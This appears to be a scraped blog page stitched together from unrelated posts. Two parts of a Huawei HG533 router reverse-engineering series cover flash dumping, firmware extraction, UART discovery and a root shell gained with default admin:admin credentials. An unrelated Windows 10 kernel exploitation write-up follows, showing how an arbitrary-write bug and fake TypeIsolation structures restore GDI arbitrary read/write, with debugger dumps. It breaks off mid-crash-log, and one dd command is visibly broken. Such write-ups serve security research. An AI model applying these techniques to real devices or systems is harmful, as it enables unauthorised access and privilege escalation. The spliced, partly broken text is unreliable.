Practical Reverse Engineering Part 4 — Dumping the Flash

Projects and learnt lessons on Systems Security, Embedded Development, IoT and anything worth writing about

  • Part 1: Hunting for Debug Ports
  • Part 2: Scouting the Firmware
  • Part 3: Following the Data
  • Part 4: Dumping the Flash
  • Part 5: Digging Through the Firmware

In Parts 1 to 3 we’ve been gathering data within its context. We could sniff the specific pieces of data we were interested in, or observe the resources used by each process. On the other hand, they had some serious limitations; we didn’t have access to ALL the data, and we had to deal with very minimal tools… And what if we had not been able to find a serial port on the PCB? What if we had but it didn’t use default credentials?

In this post we’re gonna get the data straight from the source, sacrificing context in favour of absolute access. We’re gonna dump the data from the Flash IC and decompress it so it’s usable. This method doesn’t require expensive equipment and is independent of everything we’ve done until now. An external Flash IC with a public datasheet is a reverser’s great ally.

Dumping the Memory Contents

As discussed in Part 3, we’ve got access to the datasheet for the Flash IC, so there’s no need to reverse its pinout:

Flash Pic Annotated Pinout

We also have its instruction set, so we can communicate with the IC using almost any device capable of ‘speaking’ SPI.

We also know that powering up the router will cause the Ralink to start communicating with the Flash IC, which would interfere with our own attempts to read the data. We need to stop the communication between the Ralink and the Flash IC, but the best way to do that depends on the design of the circuit we’re working with.

Do We Need to Desolder The Flash IC? [Theory]

The perfect way to avoid interference would be to simply desolder the Flash IC so it’s completely isolated from the rest of the circuit. It gives us absolute control and removes all possible sources of interference. Unfortunately, it also requires additional equipment, experience and time, so let’s see if we can avoid it.

The second option would be to find a way of keeping the Ralink inactive while everything else around it stays in standby. Microcontrollers often have a Reset pin that will force them to shut down when pulled to 0; they’re commonly used to force IC reboots without interrupting power to the board. In this case we don’t have access to the Ralink’s full datasheet (it’s probably distributed only to customers and under NDA); the IC’s form factor and the complexity of the circuit around it make for a very hard pinout to reverse, so let’s keep thinking…

What about powering one IC up but not the other? We can try applying voltage directly to the power pins of the Flash IC instead of powering up the whole circuit. Injecting power into the PCB in a way it wasn’t designed for could blow something up; we could reverse engineer the power circuit, but that’s tedious work. This router is cheap and widely available, so I took the ‘fuck it’ approach. The voltage required, according to the datasheet, is 3V; I’m just gonna apply power directly to the Flash IC and see what happens. It may power up the Ralink too, but it’s worth a try.

Flash Powered UART Connected

We start supplying power while observing the board and waiting for data from the Ralink’s UART port. We can see some LEDs light up at the back of the PCB, but there’s no data coming out of the UART port; the Ralink must not be running. Even though the Ralink is off, its connection to the Flash IC may still interfere with our traffic because of multiple design factors in both power circuit and the silicon. It’s important to keep that possibility in mind in case we see anything dodgy later on; if that was to happen we’d have to desolder the Flash IC (or just its data pins) to physically disconnect it from everything else.

The LEDs and other static components can’t communicate with the Flash IC, so they won’t be an issue as long as we can supply enough current for all of them. I’m just gonna use a bench power supply, with plenty of current available for everything. If you don’t have one you can try using the Master’s power lines, or some USB power adapter if you need some more current. They’ll probably do just fine.

Time to connect our SPI Master.

Connecting to the Flash IC

Now that we’ve confirmed there’s no need to desolder the Ralink we can connect any device that speaks SPI and start reading memory contents block by block. Any microcontroller will do, but a purpose-specific SPI-USB bridge will often be much faster. In this case I’m gonna be using a board based on the FT232H, which supports SPI among some other low level protocols.

We’ve got the pinout for both the Flash and my USB-SPI bridge, so let’s get everything connected.

Shikra and Power Connected to Flash

Now that the hardware is ready it’s time to start pumping data out.

Dumping the Data

We need some software in our computer that can understand the USB-SPI bridge’s traffic and replicate the memory contents as a binary file. Writing our own wouldn’t be difficult, but there are programs out there that already support lots of common Masters and Flash ICs. Let’s try the widely known and open source flashrom.

flashrom is old and buggy, but it already supports both the FT232H as Master and the FL064PIF as Slave. It gave me lots of trouble in both OSX and an Ubuntu VM, but ended up working just fine on a Raspberry Pi (Raspbian):

flashrom stdout

Success! We’ve got our memory dump, so we can ditch the hardware and start preparing the data for analysis.

Splitting the Binary

The file command has been able to identify some data about the binary, but that’s just because it starts with a header in a supported format. In a 0-knowledge scenario we’d use binwalk to take a first look at the binary file and find the data we’d like to extract.

Binwalk is a very useful tool for binary analysis created by the awesome hackers at /dev/ttyS0; you’ll certainly get to know them if you’re into hardware hacking.

binwalk spidump.bin

In this case we’re not in a 0-knowledge scenario; we’ve been gathering data since day 1, and we obtained a complete memory map of the Flash IC in Part 2. The addresses mentioned in the debug message are confirmed by binwalk, and it makes for much cleaner splitting of the binary, so let’s use it:

Flash Memory Map From Part 2

With the binary and the relevant addresses, it’s time to split the binary into its 4 basic segments. dd takes its parameters in terms of block size (bs, bytes), offset (skip, blocks) and size (count, blocks); all of them in decimal. We can use a calculator or let the shell do the hex do decimal conversions with $(()):

$ dd if=spidump.bin of=bootloader.bin bs=1 count=$((0x020000))
    131072+0 records in
    131072+0 records out
    131072 bytes transferred in 0.215768 secs (607467 bytes/sec)
$ dd if=spidump.bin of=mainkernel.bin bs=1 count=$((0x13D000-0x020000)) skip=$((0x020000))
    1167360+0 records in
    1167360+0 records out
    1167360 bytes transferred in 1.900925 secs (614101 bytes/sec)
$ dd if=spidump.bin of=mainrootfs.bin bs=1 count=$((0x660000-0x13D000)) skip=$((0x13D000))
    5386240+0 records in
    5386240+0 records out
    5386240 bytes transferred in 9.163635 secs (587784 bytes/sec)
$ dd if=spidump.bin of=protect.bin bs=1 count=$((0x800000-0x660000)) skip=$((0x660000))
    1703936+0 records in
    1703936+0 records out
    1703936 bytes transferred in 2.743594 secs (621060 bytes/sec)

We have created 4 different binary files:

  1. bootloader.bin: U-boot. The bootloader. It’s not compressed because the Ralink wouldn’t know how to decompress it.
  2. mainkernel.bin: Linux Kernel. The basic firmware in charge of controlling the bare metal. Compressed using lzma
  3. mainrootfs.bin: Filesystem. Contains all sorts of important binaries and configuration files. Compressed as squashfs using the lzma algorithm
  4. protect.bin: Miscellaneous data as explained in Part 3. Not compressed

Extracting the Data

Now that we’ve split the binary into its 4 basic segments, let’s take a closer look at each of them.

Bootloader

binwalk bootloader.bin

Binwalk found the uImage header and decoded it for us. U-Boot uses these headers to identify relevant memory areas. It’s the same info that the file command displayed when we fed it the whole memory dump because it’s the first header in the file.

We don’t care much for the bootloader’s contents in this case, so let’s ignore it.

Kernel

binwalk mainkernel.bin

Compression is something we have to deal with before we can make any use of the data. binwalk has confirmed what we discovered in Part 2, the kernel is compressed using lzma, a very popular compression algorithm in embedded systems. A quick check with strings mainkernel.bin | less confirms there’s no human readable data in the binary, as expected.

There are multiple tools that can decompress lzma, such as 7z or xz. None of those liked mainkernel.bin:

$ xz --decompress mainkernel.bin
xz: mainkernel.bin: File format not recognized

The uImage header is probably messing with tools, so we’re gonna have to strip it out. We know the lzma data starts at byte 0x40, so let’s copy everything but the first 64 bytes.

dd if=mainkernel of=noheader

And when we try to decompress…

$ xz --decompress mainkernel_noheader.lzma
xz: mainkernel_noheader.lzma: Compressed data is corrupt

xz has been able to recognize the file as lzma, but now it doesn’t like the data itself. We’re trying to decompress the whole mainkernel Flash area, but the stored data is extremely unlikely to be occupying 100% of the memory segment. Let’s remove any unused memory from the tail of the binary and try again:

Cut off the tail; decompression success

xz seems to have decompressed the data successfully. We can easily verify that using the strings command, which finds ASCII strings in binary files. Since we’re at it, we may as well look for something useful…

strings kernel grep key

The Wi-Fi Easy and Secure Key Derivation string looks promising, but as it turns out it’s just a hardcoded string defined by the Wi-Fi Protected Setup spec. Nothing to do with the password generation algorithm we’re interested in.

We’ve proven the data has been properly decompressed, so let’s keep moving.

Filesystem

binwalk mainrootfs.bin

The mainrootfs memory segment does not have a uImage header because it’s relevant to the kernel but not to U-Boot.

SquashFS is a very common filesystem in embedded systems. There are multiple versions and variations, and manufacturers sometimes use custom signatures to make the data harder to locate inside the binary. We may have to fiddle with multiple versions of unsquashfs and/or modify the signatures, so let me show you what the signature looks like in this case:

sqsh signature in hexdump

Since the filesystem is very common and finding the right configuration is tedious work, somebody may have already written a script to automate the task. I came across this OSX-specific fork of the Firmware Modification Kit, which compiles multiple versions of unsquashfs and includes a neat script called unsquashfs_all.sh to run all of them. It’s worth a try.

unsquashfs_all.sh mainrootfs.bin

Wasn’t that easy? We got lucky with the SquashFS version and supported signature, and unsquashfs_all.sh managed to decompress the filesystem. Now we’ve got every binary in the filesystem, every symlink and configuration file, and everything is nice and tidy:

tree unsquashed_filesystem

In the complete file tree we can see we’ve got every file in the system, (other than runtime files like those in /var/, of course).

Using the intel we have been gathering on the firmware since day 1 we can start looking for potentially interesting binaries:

grep -i -r '$INTEL' squashfs-root

If we were looking for network/application vulnerabilities in the router, having every binary and config file in the system would be massively useful.

Protected

binwalk protect.bin

As we discussed in Part 3, this memory area is not compressed and contains all pieces of data that need to survive across reboots but be different across devices. strings seems like an appropriate tool for a quick overview of the data:

strings protect.bin

Everything in there seems to be just the curcfg.xml contents, some logs and those few isolated strings in the picture. We already sniffed and analysed all of that data in Part 3, so there’s nothing else to discuss here.

Next Steps

At this point all hardware reversing for the Ralink is complete and we’ve collected everything there was to collect in ROM. Just think of what you may be interested in and there has to be a way to find it. Imagine we wanted to control the router through the UART debug port we found in Part 1, but when we try to access the ATP CLI we can’t figure out the credentials. After dumping the external Flash we’d be able to find the XML file in the protect area, and discover the credentials just like we did in Part 2 (The Rambo Approach to Intel Gatheringadmin:admin).

If you couldn’t dump the memory IC for any reason, the firmware upgrade files provided by the manufacturers will sometimes be complete memory segments; the device simply overwrites the relevant flash areas using code previously loaded to RAM. Downloading the file from the manufacturer would be the equivalent of dumping those segments from flash, so we just need to decompress them. They won’t have all the data, but it may be enough for your purposes.

Now that we’ve got the firmware we just need to think of anything we may be interested in and start looking for it through the data. In the next post we’ll dig a bit into different binaries and try to find more potentially useful data.

Реклама

Practical Reverse Engineering Part 1 — Hunting for Debug Ports

Projects and learnt lessons on Systems Security, Embedded Development, IoT and anything worth writing about

  • Part 1: Hunting for Debug Ports
  • Part 2: Scouting the Firmware
  • Part 3: Following the Data
  • Part 4: Dumping the Flash
  • Part 5: Digging Through the Firmware

 

In this series of posts we’re gonna go through the process of Reverse Engineering a router. More specifically, a Huawei HG533.

Huawei HG533

At the earliest stages, this is the most basic kind of reverse engineering. We’re simple looking for a serial port that the engineers who designed the device left in the board for debug and -potentially- technical support purposes.

Even though I’ll be explaining the process using a router, it can be applied to tons of household embedded systems. From printers to IP cameras, if it’s mildly complex it’s quite likely to be running some form of linux. It will also probably have hidden debug ports like the ones we’re gonna be looking for in this post.

Finding the Serial Port

Most UART ports I’ve found in commercial products are between 4 and 6 pins, usually neatly aligned and sometimes marked in the PCB’s silkscreen somehow. They’re not for end users, so they almost never have pins or connectors attached.

After taking a quick look at the board, 2 sets of unused pads call my atention (they were unused before I soldered those pins in the picture, anyway):

Pic of the 2 Potential UART Ports

This device seems to have 2 different serial ports to communicate with 2 different Integrated Circuits (ICs). Based on the location on the board and following their traces we can figure out which one is connected to the main IC. That’s the most likely one to have juicy data.

In this case we’re simply gonna try connecting to both of them and find out what each of them has to offer.

Identifying Useless Pins

So we’ve found 2 rows of pins that -at first sight- could be UART ports. The first thing you wanna do is find out if any of those contacts is useless. There’s a very simple trick I use to help find useless pads: Flash a bright light from the backside of the PCB and look at it from directly above. This is what that looks like:

2nd Serial Port - No Headers

We can see if any of the layers of the PCB is making contact with the solder blob in the middle of the pad.

  1. Connected to something (we can see a trace “at 2 o’clock”)
  2. NOT CONNECTED
  3. 100% connected to a plane or thick trace. It’s almost certainly a power pin, either GND or Vcc
  4. Connections at all sides. This one is very likely to be the other power pin. There’s no reason for a data pin in a debug port to be connected to 4 different traces, but the pad being surrounded by a plane would explain those connections
  5. Connected to something

Soldering Pins for Easy Access to the Lines

In the picture above we can see both serial ports.

The pads in these ports are through-hole, but the holes themselves are filled in with blobs of very hard, very high melting point solder.

I tried soldering the pins over the pads, but the solder they used is not easy to work with. For the 2nd serial port I decided to drill through the solder blobs with a Dremel and a needle bit. That way we can pass the pins through the holes and solder them properly on the back of the PCB. It worked like a charm.

Use a Dremel to Drill Through the Solder Blobs

Identifying the Pinout

So we’ve got 2 connectors with only 3 useful pins each. We still haven’t verified the ports are operative or identified the serial protocol used by the device, but the number and arrangement of pins hint at UART.

Let’s review the UART protocol. There are 6 pin types in the spec:

  • Tx [Transmitting Pin. Connects to our Rx]
  • Rx [Receiving Pin. Connects to our Tx]
  • GND [Ground. Connects to our GND]
  • Vcc [The board’s power line. Usually 3.3V or 5V. DO NOT CONNECT]
  • CTS [Typically unused]
  • DTR [Typically unused]

We also know that according to the Standard, Tx and Rx are pulled up (set to 1) by default. The Transmitter of the line (Tx) is in charge of pulling it up, which means if it’s not connected the line’s voltage will float.

So let’s compile what we know and get to some conclusions:

  1. Only 3 pins in each header are likely to be connected to anything. Those must be Tx, Rx and GND
  2. Two pins look a lot like Vcc and GND
  3. One of them -Tx- will be pulled up by default and be transmitting data
  4. The 3rd of them, Rx, will be floating until we connect the other end of the line

That information seems enough to start trying different combinations with your UART-to-USB bridge, but randomly connecting pins you don’t understand is how you end up blowing shit up.

Let’s keep digging.

A multimeter or a logic analyser would be enough to figure out which pin is which, but if you want to understand what exactly is going on in each pin, nothing beats a half decent oscilloscope:

Channel1=Tx Channel2=Rx

After checking the pins out with an oscilloscope, this is what we can see in each of them:

  1. GND and Vcc verified — solid 3.3V and 0V in pins 2 and 3, as expected
  2. Tx verified — You can clearly see the device is sending information
  3. One of the pins floats at near-0V. This must be the device’s Rx, which is floating because we haven’t connected the other side yet.

So now we know which pin is which, but if we want to talk to the serial port we need to figure out its baudrate. We can find this with a simple protocol dump from a logic analyser. If you don’t have one, you’ll have to play “guess the baudrate” with a list of the most common ones until you get readable text through the serial port.

This is a dump from a logic analyser in which we’ve enabled protocol analysis and tried a few different baudrates. When we hit the right one, we start seeing readable text in the sniffed serial data (\n\r\n\rU-Boot 1.1.3 (Aug...)

Logic Protocol Analyser

Once we have both the pinout and baudrate, we’re ready to start communicating with the device:

Documented UART Pinouts

Connecting to the Serial Ports

Now that we’ve got all the info we need on the hardware side, it’s time to start talking to the device. Connect any UART to USB bridge you have around and start wandering around. This is my hardware setup to communicate with both serial ports at the same time and monitor one of the ports with an oscilloscope:

All Connected

And when we open a serial terminal in our computer to communicate with the device, the primary UART starts spitting out useful info. These are the commands I use to connect to each port as well as the first lines they send during the boot process:

Boot Sequence

Please choose operation:
   3: Boot system code via Flash (default).
   4: Entr boot command line interface.
 0

‘Command line interface’?? We’ve found our way into the system! When we press 4we get a command line interface to interact with the device’s bootloader.

Furthermore, if we let the device start as the default 3, wait for it to finish booting up and press enter, we get the message Welcome to ATP Cli and a login prompt. If the devs had modified the password this step would be a bit of an issue, but it’s very common to find default credentials in embedded systems. After a few manual tries, the credentials admin:admin succeeded and I got access into the CLI:

-------------------------------
-----Welcome to ATP Cli------
-------------------------------

Login: admin
Password:    #Password is ‘admin'
ATP>shell

BusyBox vv1.9.1 (2013-08-29 11:15:00 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# ls
var   usr   tmp   sbin  proc  mnt   lib   init  etc   dev   bin

Running the shell command in ATP will take us directly into Linux’s CLI with root privileges 🙂

This router runs BusyBox, a linux-ish interface which I’ll talk about in more detail in the next post.

Next Steps

Now that we have access to the BusyBox CLI we can start nosing around the software. Depending on what device you’re reversing there could be plain text passwords, TLS certificates, useful algorithms, unsecured private APIs, etc. etc. etc.

In the next post we’ll focus on the software side of things. I’ll explain the differences between boot modes, how to dump memory, and other fun things you can do now that you’ve got direct access to the device’s firmware.

Thanks for reading! 🙂

Save and Reborn GDI data-only attack from Win32k TypeIsolation

1 Background

In recent years, the exploit of GDI objects to complete arbitrary memory address R/W in kernel exploitation has become more and more useful. In many types of vulnerabilityes such as pool overflow, arbitrary writes, and out-of-bound write, use after free and double free, you can use GDI objects to read and write arbitrary memory. We call this GDI data-only attack.

Microsoft introduced the win32k type isolation after the Windows 10 build 1709 release to mitigate GDI data-only attack in kernel exploitation. I discovered a mistake in Win32k TypeIsolation when I reverse win32kbase.sys. It have resulted GDI data-only attack worked again in certain common vulnerabilities. In this paper, I will share this new attack scenario.

Debug environment:

OS:

Windows 10 rs3 16299.371

FILE:

Win32kbase.sys 10.0.16299.371

2 GDI data-only attack

GDI data-only attack is one of the common methods which used in kernel exploitation. Modify GDI object member-variables by common vulnerabilities, you can use the GDI API in win32k to complete arbitrary memory read and write. At present, two GDI objects commonly used in GDI data-only attacks are Bitmap and Palette. An important structure of Bitmap is:


Typedef struct _SURFOBJ {

DHSURF dhsurf;

HSURF hsurf;

DHPDEV dhpdev;

HDEV hdev;

SIZEL sizlBitmap;

ULONG cjBits;

PVOID pvBits;

PVOID pvScan0;

LONG lDelta;

ULONG iUniq;

ULONG iBitmapFormat;

USHORT iType;

USHORT fjBitmap;

} SURFOBJ, *PSURFOBJ;

An important structure of Palette is:


Typedef struct _PALETTE64

{

BASEOBJECT64 BaseObject;

FLONG flPal;

ULONG32 cEntries;

ULONG32 ulTime;

HDC hdcHead;

ULONG64 hSelected;

ULONG64 cRefhpal;

ULONG64 cRefRegular;

ULONG64 ptransFore;

ULONG64 ptransCurrent;

ULONG64 ptransOld;

ULONG32 unk_038;

ULONG64 pfnGetNearest;

ULONG64 pfnGetMatch;

ULONG64 ulRGBTime;

ULONG64 pRGBXlate;

PALETTEENTRY *pFirstColor;

Struct _PALETTE *ppalThis;

PALETTEENTRY apalColors[3];

}

In the kernel structure of Bitmap and Palette, two important member-variables related to GDI data-only attack are Bitmap->pvScan0 and Palette->pFirstColor. Two member-variables point to Bitmap and Palette’s data field, and you can read or write data from data field through the GDI APIs. As long as we modify two member-variables to any memory address by triggering a vulnerability, we can use GetBitmapBits/SetBitmapBits or GetPaletteEntries/SetPaletteEntries to read and write arbitrary memory address.

About using the Bitmap and Palette to complete the GDI data-only attack Now that there are many related technical papers on the Internet, and it is not the focus of this paper, there will be no more deeply sharing. The relevant information can refer to the fifth part.

3 Win32k TypeIsolation

The exploit of GDI data-only attack greatly reduces the difficulty of kernel exploitation and can be used in most common types of vulnerabilities. Microsoft has added a new mitigation after Windows 10 rs3 build 1709 —- Win32k Typeisolation, which manages the GDI objects through a doubly-linked list, and separates the head of the GDI object from the data field. This is not only mitigate the exploit of pool fengshui which create a predictable pool and uses a GDI object to occupy the pool hole and modify member-variables by vulnerabilities. but also mitigate attack scenario which modifies other member-variables of GDI object header to increase the controllable range of the data field, because the head and data field is no longer adjacent.

About win32k typeisolation mechanism can refer to the following figure:

Here I will explain the important parts of the mechanism of win32k typeisolation. The detailed operation mechanism of win32k typeisolation, including the allocation, and release of GDI object, can be referred to in the fifth part.

In win32k typeisolation, GDI object is managed uniformly through the CSectionEntry doubly linked list. The view field points to a 0x28000 memory space, and the head of the GDI object is managed here. The view field is managed by view array, and the array size is 0x1000. When assigning to a GDI object, RTL_BITMAP is used as an important basis for assigning a GDI object to a specified view field.

In CSectionEntry, bitmap_allocator points to CSectionBitmapAllocator, and xored_view, xor_key, xored_rtl_bitmap are stored in CSectionBitmapAllocator, where xored_view ^ xor_key points to the view field and xored_rtl_btimap ^ xor_key points to RTL_BITMAP.

In RTL_BITMAP, bitmap_buffer_ptr points to BitmapBuffer,and BitmapBuffer is used to record the status of the view field, which is 0 for idle and 1 for in use. When applying for a GDI object, it starts traversing the CSectionEntry list through win32kbase!gpTypeIsolation and checks whether the current view field contains a free memory by CSectionBitmapAllocator. If there is a free memory, a new GDI object header will be placed in the view field.

I did some research in the reverse engineering of the implementation of GDI object allocation and release about the CTypeIsolation class and the CSectionEntry class, and then I found a mistake. TypeIsolation traverses the CSectionEntry doubly linked list, uses the CSectionBitmapAllocator to determine the state of the view field, and manages the GDI object SURFACE which stored in the view field, but does not check the validity of CSectionEntry->view and CSectionEntry->bitmap_allocator pointers, that is to say if we can construct a fake view and fake bitmap_allocator, and we can use the vulnerability to modify CSectionEntry->view and CSectionEntry->bitmap_allocator to point to fake struct, we can re-use GDI object to complete the data-only attack.

4 Save and reborn gdi data-only attack!

In this section, I would like to share the idea of ​​this attack scenario. HEVD is a practice driver developed by Hacksysteam that has typical kernel vulnerabilities. There is an Arbitrary Write vulnerability in HEVD. We use this vulnerability as example to share my attack scenario.

Attack scenario:

First look at the allocation of CSectionEntry, CSectionEntry will allocate 0x40 size session paged pool, CSectionEntry allocate pool memory implementation in NSInstrumentation::CSectionEntry::Create().


.text:00000001C002AC8A mov edx, 20h ; NumberOfBytes

.text:00000001C002AC8F mov r8d, 6F736955h ; Tag

.text:00000001C002AC95 lea ecx, [rdx+1] ; PoolType

.text:00000001C002AC98 call cs:__imp_ExAllocatePoolWithTag //Allocate 0x40 session paged pool

In other words, we can still use the pool fengshui to create a predictable session paged pool hole and it will be occupied with CSectionEntry. Therefore, in the exploit scenario of HEVD Arbitrary write, we use the tagWND to create a stable pool hole. , and use the HMValidateHandle to leak tagWND kernel object address. Because the current vulnerability instance is an arbitrary write vulnerability, if we can reveal the address of the kernel object, it will facilitate our understanding of this attack scenario, of course, in many attack scenarios, we only need to use pool fengshui to create a predictable pool.


Kd> g//make a stable pool hole by using tagWND

Break instruction exception - code 80000003 (first chance)

0033:00007ff6`89a61829 cc int 3

Kd> p

0033:00007ff6`89a6182a 488b842410010000 mov rax,qword ptr [rsp+110h]

Kd> p

0033:00007ff6`89a61832 4839842400010000 cmp qword ptr [rsp+100h],rax

Kd> r rax

Rax=ffff862e827ca220

Kd> !pool ffff862e827ca220

Pool page ffff862e827ca220 region is Unknown

Ffff862e827ca000 size: 150 previous size: 0 (Allocated) Gh04

Ffff862e827ca150 size: 10 previous size: 150 (Free) Free

Ffff862e827ca160 size: b0 previous size: 10 (Free ) Uscu

*ffff862e827ca210 size: 40 previous size: b0 (Allocated) *Ustx Process: ffffd40acb28c580

Pooltag Ustx : USERTAG_TEXT, Binary : win32k!NtUserDrawCaptionTemp

Ffff862e827ca250 size: e0 previous size: 40 (Allocated) Gla8

Ffff862e827ca330 size: e0 previous size: e0 (Allocated) Gla8```

0xffff862e827ca220 is a stable session paged pool hole, and 0xffff862e827ca220 will be released later, in a free state.


Kd> p

0033:00007ff7`abc21787 488b842498000000 mov rax,qword ptr [rsp+98h]

Kd> p

0033:00007ff7`abc2178f 48398424a0000000 cmp qword ptr [rsp+0A0h],rax

Kd> !pool ffff862e827ca220

Pool page ffff862e827ca220 region is Unknown

Ffff862e827ca000 size: 150 previous size: 0 (Allocated) Gh04

Ffff862e827ca150 size: 10 previous size: 150 (Free) Free

Ffff862e827ca160 size: b0 previous size: 10 (Free) Uscu

*ffff862e827ca210 size: 40 previous size: b0 (Free ) *Ustx

Pooltag Ustx : USERTAG_TEXT, Binary : win32k!NtUserDrawCaptionTemp

Ffff862e827ca250 size: e0 previous size: 40 (Allocated) Gla8

Ffff862e827ca330 size: e0 previous size: e0 (Allocated) Gla8

Now we need to create the CSecitionEntry to occupy 0xffff862e827ca220. This requires the use of a feature of TypeIsolation. As mentioned in the second section, when the GDI object is requested, it will traverse the CSectionEntry and determine whether there is any free in the view field, if the view field of the CSectionEntry is full, the traversal will continue to the next CSectionEntry, but if CTypeIsolation doubly linked list, all the view fields of the CSectionEntrys are full, then NSInstrumentation::CSectionEntry::Create is invoked to create a new CSectionEntry.

Therefore, we allocate a large number of GDI objects after we have finished creating the pool hole to fill up all the CSectionEntry’s view fields to ensure that a new CSectionEntry is created and occupy a pool hole of size 0x40.


Kd> g//create a large number of GDI objects, 0xffff862e827ca220 is occupied by CSectionEntry

Kd> !pool ffff862e827ca220

Pool page ffff862e827ca220 region is Unknown

Ffff862e827ca000 size: 150 previous size: 0 (Allocated) Gh04

Ffff862e827ca150 size: 10 previous size: 150 (Free) Free

Ffff862e827ca160 size: b0 previous size: 10 (Free) Uscu

*ffff862e827ca210 size: 40 previous size: b0 (Allocated) *Uiso

Pooltag Uiso : USERTAG_ISOHEAP, Binary : win32k!TypeIsolation::Create

Ffff862e827ca250 size: e0 previous size: 40 (Allocated) Gla8 ffff86b442563150 size:

Next we need to construct the fake CSectionEntry->view and fake CSectionEntry->bitmap_allocator and use the Arbitrary Write to modify the member-variable pointer in the CSectionEntry in the session paged pool hole to point to the fake struct we constructed.

The view field of the new CSectionEntry that was created when we allocate a large number of GDI objects may already be full or partially full by SURFACEs. If we construct the fake struct to construct the view field as empty, then we can deceive TypeIsolation that GDI object will place SURFACE in a known location.

We use VirtualAllocEx to allocate the memory in the userspace to store the fake struct, and we set the userspace memory property to READWRITE.


Kd> dq 1e0000//fake pushlock

00000000`001e0000 00000000`00000000 00000000`0000006c

Kd> dq 1f0000//fake view

00000000`001f0000 00000000`00000000 00000000`00000000

00000000`001f0010 00000000`00000000 00000000`00000000

Kd> dq 190000//fake RTL_BITMAP

00000000`00190000 00000000`000000f0 00000000`00190010

00000000`00190010 00000000`00000000 00000000`00000000

Kd> dq 1c0000//fake CSectionBitmapAllocator

00000000`001c0000 00000000`001e0000 deadbeef`deb2b33f

00000000`001c0010 deadbeef`deadb33f deadbeef`deb4b33f

00000000`001c0020 00000001`00000001 00000001`00000000

Among them, 0x1f0000 points to the view field, 0x1c0000 points to CSectionBitmapAllocator, and the fake view field is used to store the GDI object. The structure of CSectionBitmapAllocator needs thoughtful construction because we need to use it to deceive the typeisolation that the CSectionEntry we control is a free view item.


Typedef struct _CSECTIONBITMAPALLOCATOR {

PVOID pushlock; // + 0x00

ULONG64 xored_view; // + 0x08

ULONG64 xor_key; // + 0x10

ULONG64 xored_rtl_bitmap; // + 0x18

ULONG bitmap_hint_index; // + 0x20

ULONG num_commited_views; // + 0x24

} CSECTIONBITMAPALLOCATOR, *PCSECTIONBITMAPALLOCATOR;

The above CSectionBitmapAllocator structure compares with 0x1c0000 structure, and I defined xor_key as 0xdeadbeefdeadb33f, as long as the xor_key ^ xor_view and xor_key ^ xor_rtl_bitmap operation point to the view field and RTL_BITMAP. In the debugging I found that the pushlock must point to a valid structure pointer, otherwise it will trigger BUGCHECK, so I allocate memory 0x1e0000 to store pushlock content.

As described in the second section, bitmap_hint_index is used as a condition to quickly index in the RTL_BITMAP, so this value also needs to be set to 0x00 to indicate the index in RTL_BITMAP. In the same way we look at the structure of RTL_BITMAP.


Typedef struct _RTL_BITMAP {

ULONG64 size; // + 0x00

PVOID bitmap_buffer; // + 0x08

} RTL_BITMAP, *PRTL_BITMAP;

Kd> dyb fffff322401b90b0

76543210 76543210 76543210 76543210

-------- -------- -------- --------

Fffff322`401b90b0 11110000 00000000 00000000 00000000 f0 00 00 00

Fffff322`401b90b4 00000000 00000000 00000000 00000000 00 00 00 00

Fffff322`401b90b8 11000000 10010000 00011011 01000000 c0 90 1b 40

Fffff322`401b90bc 00100010 11110011 11111111 11111111 22 f3 ff ff

Fffff322`401b90c0 11111111 11111111 11111111 11111111 ff ff ff ff

Fffff322`401b90c4 11111111 11111111 11111111 11111111 ff ff ff ff

Fffff322`401b90c8 11111111 11111111 11111111 11111111 ff ff ff ff

Fffff322`401b90cc 11111111 11111111 11111111 11111111 ff ff ff ff

Kd> dq fffff322401b90b0

Fffff322`401b90b0 00000000`000000f0 fffff322`401b90c0//ptr to rtl_bitmap buffer

Fffff322`401b90c0 ffffffff`ffffffff ffffffff`ffffffff

Fffff322`401b90d0 ffffffff`ffffffff

Here I select a valid RTL_BITMAP as a template, where the first member-variable represents the RTL_BITMAP size, the second member-variable points to the bitmap_buffer, and the immediately adjacent bitmap_buffer represents the state of the view field in bits. To deceive typeisolation, we will all of them are set to 0, indicating that the view field of the current CSectionEntry item is all idle, referring to the 0x190000 fake RTL_BITMAP structure.

Next, we only need to modify the CSectionEntry view and CSectionBitmapAllocator pointer through the HEVD’s Arbitrary write vulnerability.


Kd> dq ffff862e827ca220//before trigger

Ffff862e`827ca220 ffff862e`827cf4f0 ffff862e`827ef300

Ffff862e`827ca230 ffffc383`08613880 ffff862e`84780000

Ffff862e`827ca240 ffff862e`827f33c0 00000000`00000000

Kd> g / / trigger vulnerability, CSectionEntry-> view and CSectionEntry-> bitmap_allocator is modified

Break instruction exception - code 80000003 (first chance)

0033:00007ff7`abc21e35 cc int 3

Kd> dq ffff862e827ca220

Ffff862e`827ca220 ffff862e`827cf4f0 ffff862e`827ef300

Ffff862e`827ca230 ffffc383`08613880 00000000`001f0000

Ffff862e`827ca240 00000000`001c0000 00000000`00000000

Next, we normally allocate a GDI object, call CreateBitmap to create a bitmap object, and then observe the state of the view field.


Kd> g

Break instruction exception - code 80000003 (first chance)

0033:00007ff7`abc21ec8 cc int 3

Kd> dq 1f0280

00000000`001f0280 00000000`00051a2e 00000000`00000000

00000000`001f0290 ffffd40a`cc9fd700 00000000`00000000

00000000`001f02a0 00000000`00051a2e 00000000`00000000

00000000`001f02b0 00000000`00000000 00000002`00000040

00000000`001f02c0 00000000`00000080 ffff862e`8277da30

00000000`001f02d0 ffff862e`8277da30 00003f02`00000040

00000000`001f02e0 00010000`00000003 00000000`00000000

00000000`001f02f0 00000000`04800200 00000000`00000000

You can see that the bitmap kernel object is placed in the fake view field. We can read the bitmap kernel object directly from the userspace. Next, we only need to directly modify the pvScan0 of the bitmap kernel object stored in the userspace, and then call the GetBitmapBits/SetBitmapBits to complete any memory address read and write.

Summarize the exploit process:

Fix for full exploit:

In the course of completing the exploit, I discovered that BSOD was generated some time, which greatly reduced the stability of the GDI data-only attack. For example,


Kd> !analyze -v

************************************************** *****************************

* *

* Bugcheck Analysis *

* *

************************************************** *****************************




SYSTEM_SERVICE_EXCEPTION (3b)

An exception happened while performing a system service routine.

Arguments:

Arg1: 00000000c0000005, Exception code that caused the bugcheck

Arg2: ffffd7d895bd9847, Address of the instruction which caused the bugcheck

Arg3: ffff8c8f89e98cf0, Address of the context record for the exception that caused the bugcheck

Arg4: 0000000000000000, zero.




Debugging Details:

------------------







OVERLAPPED_MODULE: Address regions for 'dxgmms1' and 'dump_storport.sys' overlap




EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - 0x%08lx




FAULTING_IP:

